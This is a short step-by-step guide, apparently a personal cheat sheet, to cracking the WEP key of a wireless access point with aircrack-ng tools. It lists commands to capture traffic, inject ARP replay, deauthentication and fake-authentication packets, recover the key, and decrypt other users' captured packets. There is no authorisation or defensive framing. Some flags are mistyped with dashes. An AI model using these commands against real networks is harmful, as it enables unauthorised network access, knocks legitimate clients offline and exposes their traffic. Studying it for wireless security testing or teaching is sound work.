WEP Cracking
If you want to crack WEP keys of an AP that is using WEP.
The following steps should be performed:
Start Capturing packets first:
sudo airodump-ng –bssid <APMAC> -w <CAPTUREFILE> –channel <CHANNELNUM> <IFACE>
Start capturing ARP packets:
sudo aireplay-ng –arpreplay -e <ESSID> -b <APMAC> -h <ASSOCIATEDCLIENTMAC> <IFACE>
Send deauth packets:
sudo aireplay-ng –deauth 5 -a <APMAC> -c <ASSOCIATEDCLIENTMAC> -e <ESSID> <IFACE>
Send fakeauth packets:
sudo aireplay-ng –fakeauth 5 -e <ESSID> -b <APMAC> -h <ASSOCCLIENTMAC> <IFACE>
Cracking WEP:
aircrack-ng -e <ESSID> -b <APMAC> -n <BITSIZE> -f <FUDGEFACTOR> <CAPTUREFILE>
The fudge factor is a measure of how much randomness to check for. I am not exactly sure of its cryptographic significance, however, it may make the difference between cracking a WEP key and not.
Sometimes you may have an AP with no clients connected to it. In such cases, follow the instructions at the following URL:
How to crack WEP with no clients.
Once the WEP keys are obtained then use airdecap-ng to decrypt the packets:
airdecap-ng -b <APMAC> -e <ESSID> -w <KEY> <PCAPFILE>
tcpdump -r <PCAPFILE>-dec.cap